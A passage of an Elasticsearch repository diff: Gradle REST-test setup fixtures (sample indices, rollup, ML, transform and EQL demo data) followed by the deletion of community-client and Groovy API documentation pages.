"page_count": 268} - {"index":{"_id": "Foundation"}} - {"name": "Foundation", "author": "Isaac Asimov", "release_date": "1951-06-01", "page_count": 224} - {"index":{"_id": "The Giver"}} - {"name": "The Giver", "author": "Lois Lowry", "release_date": "1993-04-26", "page_count": 208} - {"index":{"_id": "Slaughterhouse-Five"}} - {"name": "Slaughterhouse-Five", "author": "Kurt Vonnegut", "release_date": "1969-06-01", "page_count": 275} - {"index":{"_id": "The Hitchhiker's Guide to the Galaxy"}} - {"name": "The Hitchhiker's Guide to the Galaxy", "author": "Douglas Adams", "release_date": "1979-10-12", "page_count": 180} - {"index":{"_id": "Snow Crash"}} - {"name": "Snow Crash", "author": "Neal Stephenson", "release_date": "1992-06-01", "page_count": 470} - {"index":{"_id": "Neuromancer"}} - {"name": "Neuromancer", "author": "William Gibson", "release_date": "1984-07-01", "page_count": 271} - {"index":{"_id": "The Handmaid's Tale"}} - {"name": "The Handmaid's Tale", "author": "Margaret Atwood", "release_date": "1985-06-01", "page_count": 311} - {"index":{"_id": "Starship Troopers"}} - {"name": "Starship Troopers", "author": "Robert A. Heinlein", "release_date": "1959-12-01", "page_count": 335} - {"index":{"_id": "The Left Hand of Darkness"}} - {"name": "The Left Hand of Darkness", "author": "Ursula K. Le Guin", "release_date": "1969-06-01", "page_count": 304} - {"index":{"_id": "The Moon is a Harsh Mistress"}} - {"name": "The Moon is a Harsh Mistress", "author": "Robert A. Heinlein", "release_date": "1966-04-01", "page_count": 288} - -''' -buildRestTests.setups['sensor_rollup_job'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - - do: - raw: - method: PUT - path: _rollup/job/sensor - body: > - { - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size" :1000, - "groups" : { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": ["node"] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": ["min", "max", "sum"] - }, - { - "field": "voltage", - "metrics": ["avg"] - } - ] - } -''' -buildRestTests.setups['sensor_started_rollup_job'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - - - do: - bulk: - index: sensor-1 - refresh: true - body: | - {"index":{}} - {"timestamp": 1516729294000, "temperature": 200, "voltage": 5.2, "node": "a"} - {"index":{}} - {"timestamp": 1516642894000, "temperature": 201, "voltage": 5.8, "node": "b"} - {"index":{}} - {"timestamp": 1516556494000, "temperature": 202, "voltage": 5.1, "node": "a"} - {"index":{}} - {"timestamp": 1516470094000, "temperature": 198, "voltage": 5.6, "node": "b"} - {"index":{}} - {"timestamp": 1516383694000, "temperature": 200, "voltage": 4.2, "node": "c"} - {"index":{}} - {"timestamp": 1516297294000, "temperature": 202, "voltage": 4.0, "node": "c"} - - - do: - raw: - method: PUT - path: _rollup/job/sensor - body: > - { - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "* * * * * ?", - "page_size" :1000, - "groups" : { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": ["node"] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": ["min", "max", "sum"] - }, - { - "field": "voltage", - "metrics": ["avg"] - } - ] - } - - do: - raw: - method: POST - path: _rollup/job/sensor/_start -''' - -buildRestTests.setups['sensor_index'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - load: - type: double - net_in: - type: long - net_out: - type: long - hostname: - type: keyword - datacenter: - type: keyword -''' - -buildRestTests.setups['sensor_prefab_data'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - - do: - indices.create: - index: sensor_rollup - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - node.terms.value: - type: keyword - temperature.sum.value: - type: double - temperature.max.value: - type: double - temperature.min.value: - type: double - timestamp.date_histogram.time_zone: - type: keyword - timestamp.date_histogram.interval: - type: keyword - timestamp.date_histogram.timestamp: - type: date - timestamp.date_histogram._count: - type: long - voltage.avg.value: - type: double - voltage.avg._count: - type: long - _rollup.id: - type: keyword - _rollup.version: - type: long - _meta: - _rollup: - sensor: - cron: "* * * * * ?" - rollup_index: "sensor_rollup" - index_pattern: "sensor-*" - timeout: "20s" - page_size: 1000 - groups: - date_histogram: - delay: "7d" - field: "timestamp" - fixed_interval: "60m" - time_zone: "UTC" - terms: - fields: - - "node" - id: sensor - metrics: - - field: "temperature" - metrics: - - min - - max - - sum - - field: "voltage" - metrics: - - avg - - - do: - bulk: - index: sensor_rollup - refresh: true - body: | - {"index":{}} - {"node.terms.value":"b","temperature.sum.value":201.0,"temperature.max.value":201.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":201.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.800000190734863,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516640400000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"c","temperature.sum.value":200.0,"temperature.max.value":200.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":200.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":4.199999809265137,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516381200000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"a","temperature.sum.value":202.0,"temperature.max.value":202.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":202.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.099999904632568,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516554000000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"a","temperature.sum.value":200.0,"temperature.max.value":200.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":200.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.199999809265137,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516726800000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"b","temperature.sum.value":198.0,"temperature.max.value":198.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":198.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.599999904632568,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516467600000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"c","temperature.sum.value":202.0,"temperature.max.value":202.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":202.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":4.0,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516294800000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - -''' -buildRestTests.setups['sample_job'] = ''' - - do: - ml.put_job: - job_id: "sample_job" - body: > - { - "description" : "Very basic job", - "analysis_config" : { - "bucket_span":"10m", - "detectors" :[ - { - "function": "count" - } - ]}, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } - } -''' -buildRestTests.setups['farequote_index'] = ''' - - do: - indices.create: - index: farequote - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - metric: - properties: - time: - type: date - responsetime: - type: float - airline: - type: keyword - doc_count: - type: integer -''' -buildRestTests.setups['farequote_data'] = buildRestTests.setups['farequote_index'] + ''' - - do: - bulk: - index: farequote - type: metric - refresh: true - body: | - {"index": {"_id":"1"}} - {"airline":"JZA","responsetime":990.4628,"time":"2016-02-07T00:00:00+0000", "doc_count": 5} - {"index": {"_id":"2"}} - {"airline":"JBU","responsetime":877.5927,"time":"2016-02-07T00:00:00+0000", "doc_count": 23} - {"index": {"_id":"3"}} - {"airline":"KLM","responsetime":1355.4812,"time":"2016-02-07T00:00:00+0000", "doc_count": 42} -''' -buildRestTests.setups['farequote_job'] = buildRestTests.setups['farequote_data'] + ''' - - do: - ml.put_job: - job_id: "farequote" - body: > - { - "analysis_config": { - "bucket_span": "60m", - "detectors": [{ - "function": "mean", - "field_name": "responsetime", - "by_field_name": "airline" - }], - "summary_count_field_name": "doc_count" - }, - "data_description": { - "time_field": "time" - } - } -''' -buildRestTests.setups['farequote_datafeed'] = buildRestTests.setups['farequote_job'] + ''' - - do: - ml.put_datafeed: - datafeed_id: "datafeed-farequote" - body: > - { - "job_id":"farequote", - "indexes":"farequote" - } -''' -buildRestTests.setups['server_metrics_index'] = ''' - - do: - indices.create: - index: server-metrics - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - total: - type: long -''' -buildRestTests.setups['server_metrics_data'] = buildRestTests.setups['server_metrics_index'] + ''' - - do: - bulk: - index: server-metrics - type: metric - refresh: true - body: | - {"index": {"_id":"1177"}} - {"timestamp":"2017-03-23T13:00:00","total":40476} - {"index": {"_id":"1178"}} - {"timestamp":"2017-03-23T13:00:00","total":15287} - {"index": {"_id":"1179"}} - {"timestamp":"2017-03-23T13:00:00","total":-776} - {"index": {"_id":"1180"}} - {"timestamp":"2017-03-23T13:00:00","total":11366} - {"index": {"_id":"1181"}} - {"timestamp":"2017-03-23T13:00:00","total":3606} - {"index": {"_id":"1182"}} - {"timestamp":"2017-03-23T13:00:00","total":19006} - {"index": {"_id":"1183"}} - {"timestamp":"2017-03-23T13:00:00","total":38613} - {"index": {"_id":"1184"}} - {"timestamp":"2017-03-23T13:00:00","total":19516} - {"index": {"_id":"1185"}} - {"timestamp":"2017-03-23T13:00:00","total":-258} - {"index": {"_id":"1186"}} - {"timestamp":"2017-03-23T13:00:00","total":9551} - {"index": {"_id":"1187"}} - {"timestamp":"2017-03-23T13:00:00","total":11217} - {"index": {"_id":"1188"}} - {"timestamp":"2017-03-23T13:00:00","total":22557} - {"index": {"_id":"1189"}} - {"timestamp":"2017-03-23T13:00:00","total":40508} - {"index": {"_id":"1190"}} - {"timestamp":"2017-03-23T13:00:00","total":11887} - {"index": {"_id":"1191"}} - {"timestamp":"2017-03-23T13:00:00","total":31659} -''' -buildRestTests.setups['server_metrics_job'] = buildRestTests.setups['server_metrics_data'] + ''' - - do: - ml.put_job: - job_id: "total-requests" - body: > - { - "description" : "Total sum of requests", - "analysis_config" : { - "bucket_span":"10m", - "detectors" :[ - { - "detector_description": "Sum of total", - "function": "sum", - "field_name": "total" - } - ]}, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } - } -''' -buildRestTests.setups['server_metrics_job-raw'] = buildRestTests.setups['server_metrics_data'] + ''' - - do: - raw: - method: PUT - path: _ml/anomaly_detectors/total-requests - body: > - { - "description" : "Total sum of requests", - "analysis_config" : { - "bucket_span":"10m", - "detectors" :[ - { - "detector_description": "Sum of total", - "function": "sum", - "field_name": "total" - } - ]}, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } - } -''' -buildRestTests.setups['server_metrics_datafeed'] = buildRestTests.setups['server_metrics_job'] + ''' - - do: - ml.put_datafeed: - datafeed_id: "datafeed-total-requests" - body: > - { - "job_id":"total-requests", - "indexes":"server-metrics" - } -''' -buildRestTests.setups['server_metrics_datafeed-raw'] = buildRestTests.setups['server_metrics_job-raw'] + ''' - - do: - raw: - method: PUT - path: _ml/datafeeds/datafeed-total-requests - body: > - { - "job_id":"total-requests", - "indexes":"server-metrics" - } -''' -buildRestTests.setups['server_metrics_openjob'] = buildRestTests.setups['server_metrics_datafeed'] + ''' - - do: - ml.open_job: - job_id: "total-requests" -''' -buildRestTests.setups['server_metrics_openjob-raw'] = buildRestTests.setups['server_metrics_datafeed-raw'] + ''' - - do: - raw: - method: POST - path: _ml/anomaly_detectors/total-requests/_open -''' -buildRestTests.setups['server_metrics_startdf'] = buildRestTests.setups['server_metrics_openjob'] + ''' - - do: - ml.start_datafeed: - datafeed_id: "datafeed-total-requests" -''' -buildRestTests.setups['calendar_outages'] = ''' - - do: - ml.put_calendar: - calendar_id: "planned-outages" -''' -buildRestTests.setups['calendar_outages_addevent'] = buildRestTests.setups['calendar_outages'] + ''' - - do: - ml.post_calendar_events: - calendar_id: "planned-outages" - body: > - { "description": "event 1", "start_time": "2017-12-01T00:00:00Z", "end_time": "2017-12-02T00:00:00Z", "calendar_id": "planned-outages" } - - -''' -buildRestTests.setups['calendar_outages_openjob'] = buildRestTests.setups['server_metrics_openjob'] + ''' - - do: - ml.put_calendar: - calendar_id: "planned-outages" -''' -buildRestTests.setups['calendar_outages_addjob'] = buildRestTests.setups['server_metrics_openjob'] + ''' - - do: - ml.put_calendar: - calendar_id: "planned-outages" - body: > - { - "job_ids": ["total-requests"] - } -''' -buildRestTests.setups['calendar_outages_addevent'] = buildRestTests.setups['calendar_outages_addjob'] + ''' - - do: - ml.post_calendar_events: - calendar_id: "planned-outages" - body: > - { "events" : [ - { "description": "event 1", "start_time": "1513641600000", "end_time": "1513728000000"}, - { "description": "event 2", "start_time": "1513814400000", "end_time": "1513900800000"}, - { "description": "event 3", "start_time": "1514160000000", "end_time": "1514246400000"} - ]} -''' - -// used by median absolute deviation aggregation -buildRestTests.setups['reviews'] = ''' - - do: - indices.create: - index: reviews - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - product: - type: keyword - rating: - type: long - - do: - bulk: - index: reviews - refresh: true - body: | - {"index": {"_id": "1"}} - {"product": "widget-foo", "rating": 1} - {"index": {"_id": "2"}} - {"product": "widget-foo", "rating": 5} -''' -buildRestTests.setups['remote_cluster'] = buildRestTests.setups['host'] + ''' - - do: - cluster.put_settings: - body: - persistent: - cluster.remote.remote_cluster.seeds: $transport_host -''' - -buildRestTests.setups['remote_cluster_and_leader_index'] = buildRestTests.setups['remote_cluster'] + ''' - - do: - indices.create: - index: leader_index - body: - settings: - index.number_of_replicas: 0 - index.number_of_shards: 1 - index.soft_deletes.enabled: true -''' - -buildRestTests.setups['seats'] = ''' - - do: - indices.create: - index: seats - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - theatre: - type: keyword - cost: - type: long - row: - type: long - number: - type: long - sold: - type: boolean - - do: - bulk: - index: seats - refresh: true - body: | - {"index":{"_id": "1"}} - {"theatre": "Skyline", "cost": 37, "row": 1, "number": 7, "sold": false} - {"index":{"_id": "2"}} - {"theatre": "Graye", "cost": 30, "row": 3, "number": 5, "sold": false} - {"index":{"_id": "3"}} - {"theatre": "Graye", "cost": 33, "row": 2, "number": 6, "sold": false} - {"index":{"_id": "4"}} - {"theatre": "Skyline", "cost": 20, "row": 5, "number": 2, "sold": false}''' -buildRestTests.setups['kibana_sample_data_ecommerce'] = ''' - - do: - indices.create: - index: kibana_sample_data_ecommerce - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 -''' -buildRestTests.setups['add_timestamp_pipeline'] = ''' - - do: - ingest.put_pipeline: - id: "add_timestamp_pipeline" - body: > - { - "processors": [ - { - "set" : { - "field" : "@timestamp", - "value" : "{{_ingest.timestamp}}" - } - } - ] - } -''' -buildRestTests.setups['simple_kibana_continuous_pivot'] = buildRestTests.setups['kibana_sample_data_ecommerce'] + buildRestTests.setups['add_timestamp_pipeline'] + ''' - - do: - raw: - method: PUT - path: _transform/simple-kibana-ecomm-pivot - body: > - { - "source": { - "index": "kibana_sample_data_ecommerce", - "query": { - "term": { - "geoip.continent_name": { - "value": "Asia" - } - } - } - }, - "pivot": { - "group_by": { - "customer_id": { - "terms": { - "field": "customer_id" - } - } - }, - "aggregations": { - "max_price": { - "max": { - "field": "taxful_total_price" - } - } - } - }, - "description": "Maximum priced ecommerce data", - "dest": { - "index": "kibana_sample_data_ecommerce_transform", - "pipeline": "add_timestamp_pipeline" - }, - "frequency": "5m", - "sync": { - "time": { - "field": "order_date", - "delay": "60s" - } - } - } -''' -buildRestTests.setups['setup_logdata'] = ''' - - do: - indices.create: - index: logdata - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - grade: - type: byte - - do: - bulk: - index: logdata - refresh: true - body: | - {"index":{}} - {"grade": 100, "weight": 2} - {"index":{}} - {"grade": 50, "weight": 3} -''' -buildRestTests.setups['logdata_job'] = buildRestTests.setups['setup_logdata'] + ''' - - do: - ml.put_data_frame_analytics: - id: "loganalytics" - body: > - { - "source": { - "index": "logdata" - }, - "dest": { - "index": "logdata_out" - }, - "analysis": { - "outlier_detection": {} - } - } -''' -// Used by snapshot lifecycle management docs -buildRestTests.setups['setup-repository'] = ''' - - do: - snapshot.create_repository: - repository: my_repository - body: - type: fs - settings: - location: buildDir/cluster/shared/repo -''' - -// Fake sec logs data used by EQL search -buildRestTests.setups['atomic_red_regsvr32'] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 5 - number_of_routing_shards: 5 - - do: - bulk: - index: my-index-000001 - refresh: true - body: | -#atomic_red_data# -''' -/* Load the actual events only if we're going to use them. */ -File atomicRedRegsvr32File = new File("$projectDir/src/test/resources/normalized-T1117-AtomicRed-regsvr32.json") -buildRestTests.inputs.file(atomicRedRegsvr32File) -buildRestTests.doFirst { - String events = atomicRedRegsvr32File.getText('UTF-8') - // Indent like a yaml test needs - events = events.replaceAll('(?m)^', ' ') - buildRestTests.setups['atomic_red_regsvr32'] = - buildRestTests.setups['atomic_red_regsvr32'].replace('#atomic_red_data#', events) -} diff --git a/docs/community-clients/index.asciidoc b/docs/community-clients/index.asciidoc deleted file mode 100644 index 1527a2760ff..00000000000 --- a/docs/community-clients/index.asciidoc +++ /dev/null @@ -1,223 +0,0 @@ -= Community Contributed Clients - -[preface] -== Preface -:client: https://www.elastic.co/guide/en/elasticsearch/client - -[NOTE] -==== -This is a list of clients submitted by members of the Elastic community. -Elastic does not support or endorse these clients. - -If you'd like to add a new client to this list, please -https://github.com/elastic/elasticsearch/blob/master/CONTRIBUTING.md#contributing-code-and-documentation-changes[open a pull request]. -==== - -Besides the link:/guide[officially supported Elasticsearch clients], there are -a number of clients that have been contributed by the community for various languages: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[[b4j]] -== B4J -* https://www.b4x.com/android/forum/threads/server-jelasticsearch-search-and-text-analytics.73335/ - B4J client based on the official Java REST client. - -[[cpp]] -== C++ -* https://github.com/seznam/elasticlient[elasticlient]: simple library for simplified work with Elasticsearch in C++ - -[[clojure]] -== Clojure - -* https://github.com/mpenet/spandex[Spandex]: - Clojure client, based on the new official low level rest-client. - -* https://github.com/clojurewerkz/elastisch[Elastisch]: - Clojure client. - -[[coldfusion]] -== ColdFusion (CFML) - -* https://www.forgebox.io/view/cbelasticsearch[cbElasticSearch] - Native ColdFusion (CFML) support for the ColdBox MVC Platform which provides you with a fluent search interface for Elasticsearch, in addition to a CacheBox Cache provider and a Logbox Appender for logging. - -[[erlang]] -== Erlang - -* https://github.com/tsloughter/erlastic_search[erlastic_search]: - Erlang client using HTTP. - -* https://github.com/datahogs/tirexs[Tirexs]: - An https://github.com/elixir-lang/elixir[Elixir] based API/DSL, inspired by - https://github.com/karmi/tire[Tire]. Ready to use in pure Erlang - environment. - -* https://github.com/sashman/elasticsearch_elixir_bulk_processor[Elixir Bulk Processor]: - Dynamically configurable Elixir port of the [Bulk Processor](https://www.elastic.co/guide/en/elasticsearch/client/java-api/current/java-docs-bulk-processor.html). Implemented using GenStages to handle backpressure. - -[[go]] -== Go - -Also see the {client}/go-api/current/index.html[official Elasticsearch Go client]. - -* https://github.com/mattbaird/elastigo[elastigo]: - Go client. - -* https://github.com/olivere/elastic[elastic]: - Elasticsearch client for Google Go. - -* https://github.com/softctrl/elk[elk] - Golang lib for Elasticsearch client. - - -[[haskell]] -== Haskell -* https://github.com/bitemyapp/bloodhound[bloodhound]: - Haskell client and DSL. - - -[[java]] -== Java - -Also see the {client}/java-api/current/index.html[official Elasticsearch Java client]. - -* https://github.com/otto-de/flummi[Flummi]: - Java Rest client with comprehensive query DSL API -* https://github.com/searchbox-io/Jest[Jest]: - Java Rest client. - -[[javascript]] -== JavaScript - -Also see the {client}/javascript-api/current/index.html[official Elasticsearch JavaScript client]. - -[[kotlin]] -== Kotlin - -* https://github.com/mbuhot/eskotlin[ES Kotlin]: - Elasticsearch Query DSL for kotlin based on the {client}/java-api/current/index.html[official Elasticsearch Java client]. - -* https://github.com/jillesvangurp/es-kotlin-wrapper-client[ES Kotlin Wrapper Client]: - Kotlin extension functions and abstractions for the {client}/java-api/current/index.html[official Elasticsearch Highlevel Client]. Aims to reduce the amount of boilerplate needed to do searches, bulk indexing and other common things users do with the client. - -[[lua]] -== Lua - -* https://github.com/DhavalKapil/elasticsearch-lua[elasticsearch-lua]: - Lua client for Elasticsearch - -[[dotnet]] -== .NET - -Also see the {client}/net-api/current/index.html[official Elasticsearch .NET client]. - -[[perl]] -== Perl - -Also see the {client}/perl-api/current/index.html[official Elasticsearch Perl client]. - -* https://metacpan.org/pod/Elastijk[Elastijk]: A low level minimal HTTP client. - - -[[php]] -== PHP - -Also see the {client}/php-api/current/index.html[official Elasticsearch PHP client]. - -* https://github.com/ruflin/Elastica[Elastica]: - PHP client. - -* https://github.com/nervetattoo/elasticsearch[elasticsearch] PHP client. - -* https://github.com/madewithlove/elasticsearcher[elasticsearcher] Agnostic lightweight package on top of the Elasticsearch PHP client. Its main goal is to allow for easier structuring of queries and indices in your application. It does not want to hide or replace functionality of the Elasticsearch PHP client. - -[[python]] -== Python - -Also see the {client}/python-api/current/index.html[official Elasticsearch Python client]. - -[[r]] -== R - -* https://github.com/ropensci/elastic[elastic]: - A low-level R client for Elasticsearch. - -* https://github.com/ropensci/elasticdsl[elasticdsl]: - A high-level R DSL for Elasticsearch, wrapping the elastic R client. - -* https://github.com/UptakeOpenSource/uptasticsearch[uptasticsearch]: - An R client tailored to data science workflows. - -[[ruby]] -== Ruby - -Also see the {client}/ruby-api/current/index.html[official Elasticsearch Ruby client]. - -* https://github.com/printercu/elastics-rb[elastics]: - Tiny client with built-in zero-downtime migrations and ActiveRecord integration. - -* https://github.com/toptal/chewy[chewy]: - Chewy is an ODM and wrapper for the official Elasticsearch client - -* https://github.com/ankane/searchkick[Searchkick]: - Intelligent search made easy - -* https://github.com/artsy/estella[Estella]: - Make your Ruby models searchable - -[[rust]] -== Rust - -* https://github.com/benashford/rs-es[rs-es]: - A REST API client with a strongly-typed Query DSL. - -* https://github.com/elastic-rs/elastic[elastic]: - A modular REST API client that supports freeform queries. - -[[scala]] -== Scala - -* https://github.com/sksamuel/elastic4s[elastic4s]: - Scala DSL. - -* https://github.com/gphat/wabisabi[wabisabi]: - Asynchronous REST API Scala client. - -* https://github.com/workday/escalar[escalar]: - Type-safe Scala wrapper for the REST API. - -* https://github.com/SumoLogic/elasticsearch-client[elasticsearch-client]: - Scala DSL that uses the REST API. Akka and AWS helpers included. - -[[smalltalk]] -== Smalltalk - -* https://github.com/newapplesho/elasticsearch-smalltalk[elasticsearch-smalltalk] - - Pharo Smalltalk client for Elasticsearch - -[[vertx]] -== Vert.x - -* https://github.com/reactiverse/elasticsearch-client[elasticsearch-client]: - An Elasticsearch client for Eclipse Vert.x diff --git a/docs/groovy-api/anatomy.asciidoc b/docs/groovy-api/anatomy.asciidoc deleted file mode 100644 index ba7cf83bb00..00000000000 --- a/docs/groovy-api/anatomy.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[anatomy]] -== API Anatomy - -Once a <> has been -obtained, all of Elasticsearch APIs can be executed on it. Each Groovy -API is exposed using three different mechanisms. - - -[[closure]] -=== Closure Request - -The first type is to simply provide the request as a Closure, which -automatically gets resolved into the respective request instance (for -the index API, its the `IndexRequest` class). The API returns a special -future, called `GActionFuture`. This is a groovier version of -Elasticsearch Java `ActionFuture` (in turn a nicer extension to Java own -`Future`) which allows to register listeners (closures) on it for -success and failures, as well as blocking for the response. For example: - -[source,groovy] --------------------------------------------------- -def indexR = client.index { - index "test" - type "_doc" - id "1" - source { - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } - } -} - -println "Indexed $indexR.response.id into $indexR.response.index/$indexR.response.type" --------------------------------------------------- - -In the above example, calling `indexR.response` will simply block for -the response. We can also block for the response for a specific timeout: - -[source,groovy] --------------------------------------------------- -IndexResponse response = indexR.response "5s" // block for 5 seconds, same as: -response = indexR.response 5, TimeValue.SECONDS // --------------------------------------------------- - -We can also register closures that will be called on success and on -failure: - -[source,groovy] --------------------------------------------------- -indexR.success = {IndexResponse response -> - println "Indexed $response.id into $response.index/$response.type" -} -indexR.failure = {Throwable t -> - println "Failed to index: $t.message" -} --------------------------------------------------- - - -[[request]] -=== Request - -This option allows to pass the actual instance of the request (instead -of a closure) as a parameter. The rest is similar to the closure as a -parameter option (the `GActionFuture` handling). For example: - -[source,groovy] --------------------------------------------------- -def indexR = client.index (new IndexRequest( - index: "test", - type: "_doc", - id: "1", - source: { - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } - })) - -println "Indexed $indexR.response.id into $indexR.response.index/$indexR.response.type" --------------------------------------------------- - - -[[java-like]] -=== Java Like - -The last option is to provide an actual instance of the API request, and -an `ActionListener` for the callback. This is exactly like the Java API -with the added `gexecute` which returns the `GActionFuture`: - -[source,groovy] --------------------------------------------------- -def indexR = node.client.prepareIndex("test", "_doc", "1").setSource({ - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } -}).gexecute() --------------------------------------------------- diff --git a/docs/groovy-api/client.asciidoc b/docs/groovy-api/client.asciidoc deleted file mode 100644 index c3c89e71bc5..00000000000 --- a/docs/groovy-api/client.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[client]] -== Client - -Obtaining an Elasticsearch Groovy `GClient` (a `GClient` is a simple -wrapper on top of the Java `Client`) is simple. The most common way to -get a client is by starting an embedded `Node` which acts as a node -within the cluster. - - -[[node-client]] -=== Node Client - -A Node based client is the simplest form to get a `GClient` to start -executing operations against Elasticsearch. - -[source,groovy] --------------------------------------------------- -import org.elasticsearch.groovy.client.GClient -import org.elasticsearch.groovy.node.GNode -import static org.elasticsearch.groovy.node.GNodeBuilder.nodeBuilder - -// on startup - -GNode node = nodeBuilder().node(); -GClient client = node.client(); - -// on shutdown - -node.close(); --------------------------------------------------- - -Since Elasticsearch allows to configure it using JSON based settings, -the configuration itself can be done using a closure that represent the -JSON: - -[source,groovy] --------------------------------------------------- -import org.elasticsearch.groovy.node.GNode -import org.elasticsearch.groovy.node.GNodeBuilder -import static org.elasticsearch.groovy.node.GNodeBuilder.* - -// on startup - -GNodeBuilder nodeBuilder = nodeBuilder(); -nodeBuilder.settings { - node { - client = true - } - cluster { - name = "test" - } -} - -GNode node = nodeBuilder.node() - -// on shutdown - -node.stop().close() --------------------------------------------------- diff --git a/docs/groovy-api/delete.asciidoc b/docs/groovy-api/delete.asciidoc deleted file mode 100644 index 3d654782004..00000000000 --- a/docs/groovy-api/delete.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[delete]] -== Delete API - -The delete API is very similar to the -// {javaclient}/java-docs-delete.html[] -Java delete API, here is an -example: - -[source,groovy] --------------------------------------------------- -def deleteF = node.client.delete { - index "test" - type "_doc" - id "1" -} --------------------------------------------------- diff --git a/docs/groovy-api/get.asciidoc b/docs/groovy-api/get.asciidoc deleted file mode 100644 index 2cac8429c3e..00000000000 --- a/docs/groovy-api/get.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[[get]] -== Get API - -The get API is very similar to the -// {javaclient}/java-docs-get.html[] -Java get API. The main benefit -of using groovy is handling the source content. It can be automatically -converted to a `Map` which means using Groovy to navigate it is simple: - -[source,groovy] --------------------------------------------------- -def getF = node.client.get { - index "test" - type "_doc" - id "1" -} - -println "Result of field2: $getF.response.source.complex.field2" --------------------------------------------------- diff --git a/docs/groovy-api/index.asciidoc b/docs/groovy-api/index.asciidoc deleted file mode 100644 index e1bb81856f1..00000000000 --- a/docs/groovy-api/index.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -= Groovy API - -include::../Versions.asciidoc[] - -[preface] -== Preface - -This section describes the http://groovy-lang.org/[Groovy] API -Elasticsearch provides. All Elasticsearch APIs are executed using a -<>, and are completely -asynchronous in nature (they either accept a listener, or return a -future). - -The Groovy API is a wrapper on top of the -{javaclient}[Java API] exposing it in a groovier -manner. The execution options for each API follow a similar manner and -covered in <>. - - -[[maven]] -=== 